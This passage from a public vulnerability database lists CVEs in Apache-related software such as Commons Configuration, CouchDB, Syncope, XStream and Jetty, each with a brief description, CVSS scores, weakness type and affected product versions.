Apache Commons Configuration uses a third-party library to parse YAML files which, by default, allows the instantiation of classes if the YAML includes special statements. Apache Commons Configuration versions 2.2, 2.3, 2.4, 2.5 and 2.6 did not change the default settings of this library. So if a YAML file was loaded from an untrusted source, it could load and execute code out of the control of the host application.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 10.0 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 3.9 6.0

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle database_server 19c
oracle healthcare_foundation 7.1.1
oracle database_server 12.1.0.2
apache commons_configuration 2.5
oracle database_server 11.2.0.4
oracle healthcare_foundation 7.3.0
apache commons_configuration 2.2
apache commons_configuration 2.6
oracle healthcare_foundation 7.2.1
oracle database_server 18c
oracle healthcare_foundation 7.2.0
apache commons_configuration 2.3
apache commons_configuration 2.4
oracle database_server 12.2.0.1
CVE-2020-1954 LOW

Apache CXF has the ability to integrate with JMX by registering an InstrumentationManager extension with the CXF bus. If the 'createMBServerConnectorFactory' property of the default InstrumentationManagerImpl is not disabled, then it is vulnerable to a man-in-the-middle (MITM) style attack. An attacker on the same host can connect to the registry and rebind the entry to another server, thus acting as a proxy to the original. They are then able to gain access to all of the information that is sent and received over JMX.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 1.6 3.6

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle communications_session_report_manager *
oracle peoplesoft_enterprise_peopletools 8.56
oracle communications_session_route_manager *
oracle communications_diameter_signaling_router_idih: *
apache cxf *
oracle enterprise_manager_base_platform 13.2.1.0
oracle communications_diameter_signaling_router *
netapp snapmanager -
netapp oncommand_workflow_automation -
oracle communications_element_manager *
CVE-2020-1955 MEDIUM

CouchDB version 3.0.0 shipped with a new configuration setting that governs access control to the entire database server called `require_valid_user_except_for_up`. It was meant as an extension to the long-standing setting `require_valid_user`, which in turn requires that any and all requests to CouchDB be made with valid credentials, effectively forbidding any anonymous requests. The new `require_valid_user_except_for_up` is an off-by-default setting that was meant to allow requiring valid credentials for all endpoints except for the `/_up` endpoint. However, the implementation of this made an error that led to not enforcing credentials on any endpoint when enabled. CouchDB versions 3.0.1 and 3.1.0 fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-306,

Products Affected

Vendor Product Version
apache couchdb 3.0.0
CVE-2020-1956 HIGH

Apache Kylin 2.3.0 and releases up to 2.6.5 and 3.0.1 have some RESTful APIs which concatenate an OS command with the user input string; a user is likely to be able to execute any OS command without any protection or validation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache kylin 3.0.0
apache kylin 2.4.0
apache kylin 2.4.1
apache kylin *
apache kylin 3.0.1
CVE-2020-1957 HIGH

In Apache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache shiro *
debian debian_linux 8.0
CVE-2020-1958 LOW

When LDAP authentication is enabled in Apache Druid 0.17.0, callers of Druid APIs with a valid set of LDAP credentials can bypass the credentialsValidator.userSearch filter barrier that determines if a valid LDAP user is allowed to authenticate with Druid. They are still subject to role-based authorization checks, if configured. Callers of Druid APIs can also retrieve any LDAP attribute values of users that exist on the LDAP server, so long as that information is visible to the Druid server. This information disclosure does not require the caller itself to be a valid LDAP user.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache druid 0.17.0
CVE-2020-1959 HIGH

A Server-Side Template Injection was identified in Apache Syncope prior to 2.1.6 enabling attackers to inject arbitrary Java EL expressions, leading to an unauthenticated Remote Code Execution (RCE) vulnerability. Apache Syncope uses Java Bean Validation (JSR 380) custom constraint validators. When building custom constraint violation error messages, they support different types of interpolation, including Java EL expressions. Therefore, if an attacker can inject arbitrary data in the error message template being passed, they will be able to run arbitrary Java code.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-917,

Products Affected

Vendor Product Version
apache syncope *
CVE-2020-1960 LOW

A vulnerability in Apache Flink (1.1.0 to 1.1.5, 1.2.0 to 1.2.1, 1.3.0 to 1.3.3, 1.4.0 to 1.4.2, 1.5.0 to 1.5.6, 1.6.0 to 1.6.4, 1.7.0 to 1.7.2, 1.8.0 to 1.8.3, 1.9.0 to 1.9.2, 1.10.0) where, when running a process with an enabled JMXReporter, with a port configured via `metrics.reporter.<reporter_name>.port`, an attacker with local access to the machine and JMX port can execute a man-in-the-middle attack using a specially crafted request to rebind the JMXRMI registry to one under the attacker's control. This compromises any connection established to the process via JMX, allowing extraction of credentials and any other transferred data.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.7 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N 1.0 3.6

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache flink 1.10.0
apache flink *
CVE-2020-1961 HIGH

A Server-Side Template Injection vulnerability in Mail templates was discovered in Apache Syncope 2.0.X releases prior to 2.0.15 and 2.1.X releases prior to 2.1.6, enabling attackers to inject arbitrary JEXL expressions, leading to Remote Code Execution (RCE).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache syncope *
CVE-2020-1963 MEDIUM

Apache Ignite uses the H2 database to build its SQL distributed execution engine. H2 provides SQL functions which could be used by an attacker to access the filesystem.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,

Products Affected

Vendor Product Version
apache ignite *
CVE-2020-1964 HIGH

It was noticed that Apache Heron 0.20.2-incubating, Release 0.20.1-incubating, and Release v-0.20.0-incubating do not configure their YAML parser to prevent the instantiation of arbitrary types, resulting in remote code execution vulnerabilities (CWE-502: Deserialization of Untrusted Data).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache heron 0.20.1-incubating
apache heron 0.20.2-incubating
apache heron 0.20.0-incubating
CVE-2020-23922 MEDIUM

An issue was discovered in giflib through 5.1.4. DumpScreen2RGB in gif2rgb.c has a heap-based buffer over-read.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H 1.8 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-125,

Products Affected

Vendor Product Version
apache bookkeeper 4.12.1
giflib_project giflib *
CVE-2020-25649 MEDIUM

A flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. This flaw allows vulnerability to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
oracle jd_edwards_enterpriseone_tools *
oracle jd_edwards_enterpriseone_orchestrator *
oracle communications_billing_and_revenue_management 7.5.0.23.0
oracle utilities_framework 4.4.0.0.0
oracle primavera_gateway *
oracle health_sciences_empirica_signal 9.0
oracle retail_xstore_point_of_service 20.0.1
oracle communications_interactive_session_recorder 6.3
oracle utilities_framework 4.3.0.5.0
oracle agile_plm 9.3.6
oracle blockchain_platform *
oracle retail_xstore_point_of_service 18.0.3
netapp oncommand_api_services -
oracle retail_xstore_point_of_service 16.0.6
oracle communications_offline_mediation_controller 12.0.0.3
oracle insurance_policy_administration *
oracle communications_services_gatekeeper 7.0
oracle agile_product_lifecycle_management_integration_pack 3.6
oracle coherence 14.1.1.0.0
oracle webcenter_portal 12.2.1.3.0
oracle retail_xstore_point_of_service 17.0.4
oracle communications_cloud_native_core_unified_data_repository 1.4.0
oracle communications_convergent_charging_controller 12.0.4.0.0
oracle webcenter_portal 12.2.1.4.0
oracle banking_apis *
fasterxml jackson-databind *
oracle primavera_gateway 20.12.0
oracle commerce_platform 11.2.0
oracle communications_evolved_communications_application_server 7.1
apache iotdb *
oracle banking_apis 19.1
oracle banking_treasury_management 4.4
oracle communications_interactive_session_recorder 6.4
oracle banking_platform 2.9.0
oracle commerce_platform *
oracle banking_platform 2.6.2
oracle banking_platform 2.7.1
oracle utilities_framework 4.4.0.2.0
oracle banking_apis 20.1
oracle retail_service_backbone 15.0.3.1
oracle insurance_policy_administration 11.0.2
oracle banking_platform 2.7.0
oracle retail_service_backbone 16.0.3
oracle coherence 12.2.1.4.0
netapp service_level_manager -
oracle banking_apis 21.1
oracle insurance_rules_palette *
oracle communications_instant_messaging_server 10.0.1.5.0
quarkus quarkus *
oracle goldengate_application_adapters 19.1.0.0.0
oracle communications_unified_inventory_management 7.4.1
fedoraproject fedora 32
oracle health_sciences_empirica_signal 9.1
oracle utilities_framework 4.3.0.6.0
oracle communications_billing_and_revenue_management 12.0.0.3.0
oracle utilities_framework 4.4.0.3.0
oracle sd-wan_edge 9.0
oracle retail_xstore_point_of_service 19.0.2
oracle communications_messaging_server 8.0.2
oracle banking_platform 2.8.0
oracle communications_network_charging_and_control 12.0.4.0.0
oracle banking_apis 19.2
oracle banking_platform 2.10.0
oracle retail_service_backbone 14.1.3.2
oracle communications_pricing_design_center 12.0.0.4.0
oracle communications_messaging_server 8.1
netapp oncommand_workflow_automation -
oracle insurance_rules_palette 11.0.2
CVE-2020-26217 HIGH

XStream before version 1.4.14 is vulnerable to Remote Code Execution. The vulnerability may allow a remote attacker to run arbitrary shell commands only by manipulating the processed input stream. Only users who rely on blocklists are affected. Anyone using XStream's Security Framework allowlist is not affected. The linked advisory provides code workarounds for users who cannot upgrade. The issue is fixed in version 1.4.14.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 8.0 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H 1.3 6.0
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle banking_corporate_lending_process_management 14.5
oracle banking_cash_management 14.3
netapp snapmanager *
oracle banking_corporate_lending_process_management 14.3
oracle banking_virtual_account_management 14.2.0
debian debian_linux 10.0
oracle endeca_information_discovery_studio 3.2.0.0
oracle banking_cash_management 14.5
xstream_project xstream *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
netapp snapmanager -
oracle business_activity_monitoring 11.1.1.9.0
oracle retail_xstore_point_of_service 16.0.6
oracle banking_trade_finance_process_management 14.3
oracle business_activity_monitoring 12.2.1.4.0
apache activemq *
debian debian_linux 9.0
oracle banking_credit_facilities_process_management 14.5
oracle banking_trade_finance_process_management 14.5
oracle retail_xstore_point_of_service 17.0.4
apache activemq 5.16.0
oracle banking_corporate_lending_process_management 14.2
oracle business_activity_monitoring 12.2.1.3.0
oracle banking_trade_finance_process_management 14.2
oracle retail_xstore_point_of_service 19.0.2
oracle banking_credit_facilities_process_management 14.2
oracle banking_supply_chain_finance 14.3
apache activemq 5.15.4
oracle banking_platform 2.9.0
oracle banking_cash_management 14.2
oracle banking_supply_chain_finance 14.2
oracle banking_platform 2.4.0
oracle banking_virtual_account_management 14.3.0
oracle banking_supply_chain_finance 14.5
oracle banking_platform 2.7.1
oracle banking_credit_facilities_process_management 14.3
CVE-2020-26258 MEDIUM

XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.15, a Server-Side Request Forgery vulnerability can be activated when unmarshalling. The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.15. The reported vulnerability does not exist if running Java 15 or higher. No user is affected who followed the recommendation to set up XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whitelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.14 or below who still want to use XStream's default blacklist can use a workaround described in more detail in the referenced advisories.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security-advisories@github.com 7.7 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N 3.1 4.0
nvd@nist.gov 7.7 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N 3.1 4.0

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache struts *
xstream_project xstream *
fedoraproject fedora 34
debian debian_linux 9.0
debian debian_linux 10.0
fedoraproject fedora 33
CVE-2020-26259 MEDIUM

XStream is a Java library to serialize objects to XML and back again. XStream before version 1.4.15 is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling. The vulnerability may allow a remote attacker to delete arbitrary known files on the host, as long as the executing process has sufficient rights, only by manipulating the processed input stream. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.15. The reported vulnerability does not exist when running Java 15 or higher. No user is affected who followed the recommendation to set up XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whitelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.14 or below who still want to use XStream's default blacklist can use a workaround described in more detail in the referenced advisories.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N 2.2 4.0
security-advisories@github.com 6.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N 2.2 4.0

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-78,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache struts *
xstream_project xstream *
fedoraproject fedora 34
debian debian_linux 9.0
debian debian_linux 10.0
fedoraproject fedora 33
CVE-2020-27216 MEDIUM

In Eclipse Jetty versions 1.0 through 9.4.32.v20200930, 10.0.0.alpha1 through 10.0.0.beta2, and 11.0.0.alpha1 through 11.0.0.beta2O, on Unix-like systems, the system's temporary directory is shared between all users on that system. A co-located user can observe the process of creating a temporary subdirectory in the shared temporary directory and race to complete the creation of the temporary subdirectory. If the attacker wins the race, then they will have read and write permission to the subdirectory used to unpack web applications, including their WEB-INF/lib jar files and JSP files. If any code is ever executed out of this temporary directory, this can lead to a local privilege escalation vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.0 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.0 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-378,CWE-379,NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle jd_edwards_enterpriseone_tools *
debian debian_linux 10.0
eclipse jetty 11.0.0
eclipse jetty 10.0.0
eclipse jetty *
netapp vasa_provider *
apache beam 2.23.0
apache beam 2.24.0
oracle communications_pricing_design_center 12.0.0.3.0
apache beam 2.25.0
oracle flexcube_private_banking 12.0.0
oracle flexcube_core_banking *
oracle communications_element_manager *
netapp snap_creator_framework -
oracle communications_services_gatekeeper 7.0
debian debian_linux 9.0
netapp snapcenter -
oracle communications_application_session_controller 3.9m0p2
oracle communications_offline_mediation_controller 12.0.0.3.0
oracle siebel_core_-_automation *
apache beam 2.21.0
netapp storage_replication_adapter *
oracle flexcube_private_banking 12.1.0
apache beam 2.22.0
netapp virtual_storage_console *
oracle communications_converged_application_server_-_service_controller 6.2
CVE-2020-27218 MEDIUM

In Eclipse Jetty version 9.4.0.RC0 to 9.4.34.v20201102, 10.0.0.alpha0 to 10.0.0.beta2, and 11.0.0.alpha0 to 11.0.0.beta2, if GZIP request body inflation is enabled and requests from different clients are multiplexed onto a single connection, and if an attacker can send a request with a body that is received entirely but not consumed by the application, then a subsequent request on the same connection will see that body prepended to its body. The attacker will not see any data but may inject data into the body of the subsequent request.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L 2.2 2.5

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-226,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
oracle communications_session_route_manager *
apache spark 2.4.8
oracle communications_services_gatekeeper 7.0
oracle rest_data_services *
apache kafka 2.7.0
debian debian_linux 10.0
oracle retail_eftlink 20.0.0
eclipse jetty 11.0.0
eclipse jetty 10.0.0
eclipse jetty *
oracle communications_offline_mediation_controller 12.0.0.3.0
oracle siebel_core_-_automation *
oracle communications_pricing_design_center 12.0.0.3.0
oracle blockchain_platform *
oracle hyperion_infrastructure_technology 11.1.2.6.0
oracle flexcube_private_banking 12.0.0
apache spark 3.0.3
netapp oncommand_system_manager *
oracle flexcube_private_banking 12.1.0
oracle communications_converged_application_server_-_service_controller 6.2
CVE-2020-27223 MEDIUM

In Eclipse Jetty 9.4.6.v20170531 to 9.4.36.v20210114 (inclusive), 10.0.0, and 11.0.0 when Jetty handles a request containing multiple Accept headers with a large number of “quality” (i.e. q) parameters, the server may enter a denial of service (DoS) state due to high CPU usage processing those quality values, resulting in minutes of CPU time exhausted processing those quality values.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 3.9 1.4
emo@eclipse.org 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-407,CWE-400,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
apache solr 8.8.1
netapp e-series_santricity_web_services -
oracle rest_data_services *
netapp snapcenter -
debian debian_linux 10.0
netapp hci -
netapp management_services_for_element_software -
eclipse jetty 11.0.0
eclipse jetty 10.0.0
netapp e-series_santricity_os_controller *
eclipse jetty *
netapp element_plug-in_for_vcenter_server -
apache spark 3.1.1
eclipse jetty 9.4.6
eclipse jetty 9.4.36
netapp solidfire -
apache nifi 1.13.0
netapp snapmanager -
netapp hci_management_node -
CVE-2020-28052 MEDIUM

An issue was discovered in Legion of the Bouncy Castle BC Java 1.65 and 1.66. The OpenBSDBCrypt.checkPassword utility method compared incorrect data when checking the password, allowing incorrect passwords to indicate they were matching with previously hashed ones that were different.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle communications_application_session_controller 3.9m0p3
oracle communications_cloud_native_core_network_slice_selection_function 1.2.1
oracle communications_convergence 3.0.2.2.0
oracle communications_session_route_manager *
oracle jd_edwards_enterpriseone_tools *
oracle commerce_guided_search 11.3.2
oracle banking_corporate_lending_process_management 14.3.0
oracle banking_supply_chain_finance 14.3.0
oracle webcenter_portal 11.1.1.9.0
oracle banking_credit_facilities_process_management 14.3.0
oracle banking_virtual_account_management 14.2.0
oracle utilities_framework 4.4.0.0.0
oracle communications_session_report_manager *
bouncycastle bc-java 1.66
bouncycastle legion-of-the-bouncy-castle-java-crytography-api 1.65
oracle peoplesoft_enterprise_peopletools 8.58
oracle banking_credit_facilities_process_management 14.5.0
oracle banking_extensibility_workbench 14.2.0
oracle communications_pricing_design_center 12.0.0.3.0
oracle blockchain_platform *
oracle banking_virtual_account_management 14.5.0
oracle peoplesoft_enterprise_peopletools 8.57
oracle utilities_framework 4.3.0.6.0
oracle banking_supply_chain_finance 14.2.0
apache karaf 4.3.2
oracle webcenter_portal 12.2.1.3.0
oracle banking_extensibility_workbench 14.5.0
oracle utilities_framework 4.4.0.3.0
oracle banking_extensibility_workbench 14.3.0
oracle webcenter_portal 12.2.1.4.0
oracle banking_corporate_lending_process_management 14.5.0
oracle communications_messaging_server 8.0.2
bouncycastle bc-java 1.65
oracle peoplesoft_enterprise_peopletools 8.56
oracle banking_corporate_lending_process_management 14.2.0
oracle banking_supply_chain_finance 14.5.0
bouncycastle legion-of-the-bouncy-castle-java-crytography-api 1.66
oracle banking_credit_facilities_process_management 14.2.0
oracle communications_messaging_server 8.1
oracle banking_virtual_account_management 14.3.0
oracle utilities_framework 4.4.0.2.0
CVE-2020-35451 LOW

There is a race condition in OozieSharelibCLI in Apache Oozie before version 5.2.1 which allows a malicious attacker to replace the files in Oozie's sharelib during its creation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.7 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N 1.0 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-377,CWE-362,

Products Affected

Vendor Product Version
apache oozie *
CVE-2020-35452 MEDIUM

In Apache HTTP Server versions 2.4.0 to 2.4.46, a specially crafted Digest nonce can cause a stack overflow in mod_auth_digest. There is no report of this overflow being exploitable, nor could the Apache HTTP Server team create one, though some particular compiler and/or compilation option might make it possible, with limited consequences anyway due to the size (a single byte) and the value (zero byte) of the overflow.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
debian debian_linux 9.0
oracle instantis_enterprisetrack 17.1
oracle zfs_storage_appliance_kit 8.8
debian debian_linux 10.0
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle enterprise_manager_ops_center 12.4.0.0
CVE-2020-36230 MEDIUM

A flaw was discovered in OpenLDAP before 2.4.57 leading to an assertion failure in slapd in the X.509 DN parsing in decode.c ber_next_element, resulting in denial of service.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-617,

Products Affected

Vendor Product Version
apache bookkeeper 4.12.1
apple mac_os_x *
debian debian_linux 9.0
apple macos *
apple mac_os_x 10.14.6
debian debian_linux 10.0
openldap openldap *
CVE-2020-5499 HIGH

Baidu Rust SGX SDK through 1.0.8 has an enclave ID race. There are non-deterministic results in which, sometimes, two global IDs are the same.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache rust_sgx_sdk *
CVE-2020-5529 MEDIUM

HtmlUnit prior to 2.37.0 contains code execution vulnerabilities. HtmlUnit initializes the Rhino engine improperly, hence malicious JavaScript code can execute arbitrary Java code on the application. Moreover, when embedded in an Android application, Android-specific initialization of the Rhino engine is done in an improper way, hence malicious JavaScript code can execute arbitrary Java code on the application.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-665,CWE-94,

Products Affected

Vendor Product Version
canonical ubuntu_linux 16.04
debian debian_linux 9.0
htmlunit htmlunit *
apache camel -
CVE-2020-8022 HIGH

An Incorrect Default Permissions vulnerability in the packaging of tomcat on SUSE Enterprise Storage 5, SUSE Linux Enterprise Server 12-SP2-BCL, SUSE Linux Enterprise Server 12-SP2-LTSS, SUSE Linux Enterprise Server 12-SP3-BCL, SUSE Linux Enterprise Server 12-SP3-LTSS, SUSE Linux Enterprise Server 12-SP4, SUSE Linux Enterprise Server 12-SP5, SUSE Linux Enterprise Server 15-LTSS, SUSE Linux Enterprise Server for SAP 12-SP2, SUSE Linux Enterprise Server for SAP 12-SP3, SUSE Linux Enterprise Server for SAP 15, SUSE OpenStack Cloud 7, SUSE OpenStack Cloud 8, and SUSE OpenStack Cloud Crowbar 8 allows local attackers to escalate from group tomcat to root. This issue affects: SUSE Enterprise Storage 5 tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP2-BCL tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP2-LTSS tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP3-BCL tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP3-LTSS tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server 12-SP4 tomcat versions prior to 9.0.35-3.39.1. SUSE Linux Enterprise Server 12-SP5 tomcat versions prior to 9.0.35-3.39.1. SUSE Linux Enterprise Server 15-LTSS tomcat versions prior to 9.0.35-3.57.3. SUSE Linux Enterprise Server for SAP 12-SP2 tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server for SAP 12-SP3 tomcat versions prior to 8.0.53-29.32.1. SUSE Linux Enterprise Server for SAP 15 tomcat versions prior to 9.0.35-3.57.3. SUSE OpenStack Cloud 7 tomcat versions prior to 8.0.53-29.32.1. SUSE OpenStack Cloud 8 tomcat versions prior to 8.0.53-29.32.1. SUSE OpenStack Cloud Crowbar 8 tomcat versions prior to 8.0.53-29.32.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
meissner@suse.de 7.7 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 2.5 5.2
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-276,

Products Affected

Vendor Product Version
apache tomcat *
opensuse leap 15.1
CVE-2020-9479 MEDIUM

When loading a UDF, a specially crafted zip file could allow files to be placed outside of the UDF deployment directory. This issue affected Apache AsterixDB unreleased builds between commits 580b81aa5e8888b8e1b0620521a1c9680e54df73 and 28c0ee84f1387ab5d0659e9e822f4e3923ddc22d. Note: this CVE may be REJECTed as the issue did not affect any released versions of Apache AsterixDB

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache asterixdb *
CVE-2020-9480 HIGH

In Apache Spark 2.4.5 and earlier, a standalone resource manager's master may be configured to require authentication (spark.authenticate) via a shared secret. When enabled, however, a specially-crafted RPC to the master can succeed in starting an application's resources on the Spark cluster, even without the shared key. This can be leveraged to execute shell commands on the host machine. This does not affect Spark clusters using other resource managers (YARN, Mesos, etc).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-306,

Products Affected

Vendor Product Version
apache spark *
oracle business_intelligence 5.5.0.0.0
CVE-2020-9481 MEDIUM

Apache ATS 6.0.0 to 6.2.3, 7.0.0 to 7.1.9, and 8.0.0 to 8.0.6 is vulnerable to an HTTP/2 slow read attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2020-9482 MEDIUM

If NiFi Registry 0.1.0 to 0.5.0 uses an authentication mechanism other than PKI, when the user clicks Log Out, NiFi Registry invalidates the authentication token on the client side but not on the server side. This permits the user's client-side token to be used for up to 12 hours after logging out to make API requests to NiFi Registry.

CVSS 3.x

